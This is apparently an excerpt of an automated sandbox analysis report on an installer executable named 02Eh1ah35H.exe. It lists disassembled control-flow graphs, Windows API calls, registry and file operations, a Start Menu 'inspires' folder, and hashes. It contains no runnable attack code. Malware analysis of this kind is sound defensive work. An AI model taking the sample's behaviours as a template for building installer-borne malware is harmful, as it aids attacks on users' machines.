                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp$C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                                                                                                                                                                • API String ID: 1941528284-1199726073
                                                                                                                                                                                • Opcode ID: d08f73f743aae90bf59320a470bb384619887ead500b3c6bbfc993fd6adf6129
                                                                                                                                                                                • Instruction ID: cd03b910d30ecf031e582351f340fed2e2266b195dd1fdcb6122cfe31266ec79
                                                                                                                                                                                • Opcode Fuzzy Hash: d08f73f743aae90bf59320a470bb384619887ead500b3c6bbfc993fd6adf6129
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B418571510508BACF11BFB5CD85DAE3A79EF45329B20423FF422B11E1DB3C8A519A6E

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 849 405456-40546b 850 405471-405482 849->850 851 405522-405526 849->851 852 405484-405488 call 40642b 850->852 853 40548d-405499 lstrlenW 850->853 852->853 855 4054b6-4054ba 853->855 856 40549b-4054ab lstrlenW 853->856 857 4054c9-4054cd 855->857 858 4054bc-4054c3 SetWindowTextW 855->858 856->851 859 4054ad-4054b1 lstrcatW 856->859 860 405513-405515 857->860 861 4054cf-405511 SendMessageW * 3 857->861 858->857 859->855 860->851 862 405517-40551a 860->862 861->860 862->851
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                                                                                                                • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                                                                                                                • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,76F423A0), ref: 004054B1
                                                                                                                                                                                • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                                                                • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                                                                                                                                                                • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                                                                                                                                                                • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                                                                                                                                                                • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 863 405925-405970 CreateDirectoryW 864 405972-405974 863->864 865 405976-405983 GetLastError 863->865 866 40599d-40599f 864->866 865->866 867 405985-405999 SetFileSecurityW 865->867 867->864 868 40599b GetLastError 867->868 868->866
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040597C
                                                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040599B
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                                                                                                                                                                • C:\Users\user\Desktop, xrefs: 00405925
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                • API String ID: 3449924974-26219170
                                                                                                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                                                                                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 869 406773-406793 GetSystemDirectoryW 870 406795 869->870 871 406797-406799 869->871 870->871 872 4067aa-4067ac 871->872 873 40679b-4067a4 871->873 875 4067ad-4067e0 wsprintfW LoadLibraryExW 872->875 873->872 874 4067a6-4067a8 873->874 874->875
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                                                                                                                                                • wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                                                                                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 876 40324c-403263 877 403265 876->877 878 40326c-403275 876->878 877->878 879 403277 878->879 880 40327e-403283 878->880 879->880 881 403293-4032a0 call 403444 880->881 882 403285-40328e call 40345a 880->882 886 403432 881->886 887 4032a6-4032aa 881->887 882->881 888 403434-403435 886->888 889 4032b0-4032d6 GetTickCount 887->889 890 4033dd-4033df 887->890 893 40343d-403441 888->893 894 40343a 889->894 895 4032dc-4032e4 889->895 891 4033e1-4033e4 890->891 892 40341f-403422 890->892 891->894 898 4033e6 891->898 896 403424 892->896 897 403427-403430 call 403444 892->897 894->893 899 4032e6 895->899 900 4032e9-4032f7 call 403444 895->900 896->897 897->886 908 403437 897->908 902 4033e9-4033ef 898->902 899->900 900->886 910 4032fd-403306 900->910 905 4033f1 902->905 906 4033f3-403401 call 403444 902->906 905->906 906->886 913 403403-40340f call 405f96 906->913 908->894 912 40330c-40332c call 40693e 910->912 917 403332-403345 GetTickCount 912->917 918 4033d5-4033d7 912->918 922 403411-40341b 913->922 923 4033d9-4033db 913->923 920 403390-403392 917->920 921 403347-40334f 917->921 918->888 927 403394-403398 920->927 928 4033c9-4033cd 920->928 925 403351-403355 921->925 926 403357-403388 MulDiv wsprintfW call 405456 921->926 922->902 924 40341d 922->924 923->888 924->894 925->920 925->926 933 40338d 926->933 931 40339a-4033a1 call 405f96 927->931 932 4033af-4033ba 927->932 928->895 929 4033d3 928->929 929->894 936 4033a6-4033a8 931->936 935 4033bd-4033c1 932->935 933->920 935->912 937 4033c7 935->937 936->923 938 4033aa-4033ad 936->938 937->894 938->935
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                                                • API String ID: 551687249-2449383134
                                                                                                                                                                                • Opcode ID: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                                                                                                                                                                • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                                                                                                                                                                • Opcode Fuzzy Hash: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                                                                                                                                                                • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 939 405f13-405f1f 940 405f20-405f54 GetTickCount GetTempFileNameW 939->940 941 405f63-405f65 940->941 942 405f56-405f58 940->942 944 405f5d-405f60 941->944 942->940 943 405f5a 942->943 943->944
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405F31
                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\02Eh1ah35H.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                                                                                                                                                                Strings
                                                                                                                                                                                • nsa, xrefs: 00405F20
                                                                                                                                                                                • "C:\Users\user\Desktop\02Eh1ah35H.exe", xrefs: 00405F13
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                • API String ID: 1716503409-119190685
                                                                                                                                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                                                                                                                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 945 402e41-402e6a call 40625b 947 402e6f-402e73 945->947 948 402f24-402f28 947->948 949 402e79-402e7d 947->949 950 402ea2-402eb5 949->950 951 402e7f-402ea0 RegEnumValueW 949->951 953 402ede-402ee5 RegEnumKeyW 950->953 951->950 952 402f09-402f17 RegCloseKey 951->952 952->948 954 402eb7-402eb9 953->954 955 402ee7-402ef9 RegCloseKey call 4067e3 953->955 954->952 956 402ebb-402ecf call 402e41 954->956 960 402f19-402f1f 955->960 961 402efb-402f07 RegDeleteKeyW 955->961 956->955 963 402ed1-402edd 956->963 960->948 961->948 963->953
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                                • Opcode ID: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                                                                                                                                                                • Instruction ID: 6d47fb934da24c9d717e5f7ce43986d94c12ea4066fa177ccbd406c8c521aae0
                                                                                                                                                                                • Opcode Fuzzy Hash: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                                                                                                                                                                • Instruction Fuzzy Hash: D1215A71500109BBDF129F90CE89EEF7A7DEB54348F110076F909B21A0E7B49E54AAA8

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 964 6fdf1777-6fdf17b6 call 6fdf1b5f 968 6fdf17bc-6fdf17c0 964->968 969 6fdf18d6-6fdf18d8 964->969 970 6fdf17c9-6fdf17d6 call 6fdf23e0 968->970 971 6fdf17c2-6fdf17c8 call 6fdf239e 968->971 976 6fdf17d8-6fdf17dd 970->976 977 6fdf1806-6fdf180d 970->977 971->970 980 6fdf17df-6fdf17e0 976->980 981 6fdf17f8-6fdf17fb 976->981 978 6fdf180f-6fdf182b call 6fdf25b5 call 6fdf15b4 call 6fdf1272 GlobalFree 977->978 979 6fdf182d-6fdf1831 977->979 1004 6fdf1885-6fdf1889 978->1004 986 6fdf187e-6fdf1884 call 6fdf25b5 979->986 987 6fdf1833-6fdf187c call 6fdf15c6 call 6fdf25b5 979->987 984 6fdf17e8-6fdf17e9 call 6fdf2af8 980->984 985 6fdf17e2-6fdf17e3 980->985 981->977 982 6fdf17fd-6fdf17fe call 6fdf2d83 981->982 996 6fdf1803 982->996 999 6fdf17ee 984->999 992 6fdf17e5-6fdf17e6 985->992 993 6fdf17f0-6fdf17f6 call 6fdf2770 985->993 986->1004 987->1004 992->977 992->984 1003 6fdf1805 993->1003 996->1003 999->996 1003->977 1007 6fdf188b-6fdf1899 call 6fdf2578 1004->1007 1008 6fdf18c6-6fdf18cd 1004->1008 1014 6fdf189b-6fdf189e 1007->1014 1015 6fdf18b1-6fdf18b8 1007->1015 1008->969 1010 6fdf18cf-6fdf18d0 GlobalFree 1008->1010 1010->969 1014->1015 1016 6fdf18a0-6fdf18a8 1014->1016 1015->1008 1017 6fdf18ba-6fdf18c5 call 6fdf153d 1015->1017 1016->1015 1019 6fdf18aa-6fdf18ab FreeLibrary 1016->1019 1017->1008 1019->1015
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6FDF1B5F: GlobalFree.KERNEL32(?), ref: 6FDF1DD4
                                                                                                                                                                                  • Part of subcall function 6FDF1B5F: GlobalFree.KERNEL32(?), ref: 6FDF1DD9
                                                                                                                                                                                  • Part of subcall function 6FDF1B5F: GlobalFree.KERNEL32(?), ref: 6FDF1DDE
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF1825
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 6FDF18AB
                                                                                                                                                                                • GlobalFree.KERNELBASE(00000000), ref: 6FDF18D0
                                                                                                                                                                                  • Part of subcall function 6FDF239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FDF23CF
                                                                                                                                                                                  • Part of subcall function 6FDF2770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FDF17F6,00000000), ref: 6FDF2840
                                                                                                                                                                                  • Part of subcall function 6FDF15C6: wsprintfW.USER32 ref: 6FDF15F4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3962662361-3916222277
                                                                                                                                                                                • Opcode ID: 44c79d5f6a5953175fcf99d6156ad97cfadd61064aa6859de827fbea7f268dc2
                                                                                                                                                                                • Instruction ID: e902de0ecbccda64105958fdeccf7782c69ebed2308a8ea05f2b344fc4a27fbb
                                                                                                                                                                                • Opcode Fuzzy Hash: 44c79d5f6a5953175fcf99d6156ad97cfadd61064aa6859de827fbea7f268dc2
                                                                                                                                                                                • Instruction Fuzzy Hash: 8041E1F1402345EADF819F74EA84FC537A8BF06329F0A4166E9199E1C6DB74B08687B0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                  • Part of subcall function 00405925: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00401640
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                                                                                                                                                                • API String ID: 1892508949-3207577588
                                                                                                                                                                                • Opcode ID: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                                                                                                                                                                • Instruction ID: df70cc4d1a75ed244d2a997ae4edf05539497ac8b3a7dfb8588bf84231242a1b
                                                                                                                                                                                • Opcode Fuzzy Hash: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                                                                                                                                                                • Instruction Fuzzy Hash: 2811E231504104EBCF206FA5CD4099F37B0EF25329B28493BEA11B12F1D63E4A819B5E
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                                                                                                                                                  • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                                                                                                                  • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                                                                                                                  • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,76F423A0), ref: 004054B1
                                                                                                                                                                                  • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 334405425-0
                                                                                                                                                                                • Opcode ID: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                                                                                                                                                                • Instruction ID: a0686faca365a727748c0602422b19a99e1e577425e3ae8133f46283b43b75e6
                                                                                                                                                                                • Opcode Fuzzy Hash: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                                                                                                                                                                • Instruction Fuzzy Hash: 63219671600104EBCF10AFA5CE49A9E7A71AF55358F70413BF515B91E0CBBD8E829A2E
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                                                                • Opcode ID: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                                                                                                                                                                • Instruction ID: 2334a48e4172ebb904b3f5af91f3a45bddc9a396230004d4704967bba2e99f69
                                                                                                                                                                                • Opcode Fuzzy Hash: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                                                                                                                                                                • Instruction Fuzzy Hash: 822162736001109BDB20AF64DDC495A73B4AB18328725453BF952F72D0C6B8A8508BAD
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402553
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                • Opcode ID: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                                                                                                                                                                • Instruction ID: ca3dd7d1b7a13d3c8a9a28b827632004175b2a1fd75c59dcebef83c1aa991e75
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                                                                                                                                                                • Instruction Fuzzy Hash: 00113AB1911219EBDF14DFA4DE589AEB774FF04354B20843BE402B62D0D7B88A44DB6E
                                                                                                                                                                                APIs
                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                                                                                                                                                                • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                                                                                                                                                                • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                                                                                                                                                                • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040244E
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseDeleteValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2831762973-0
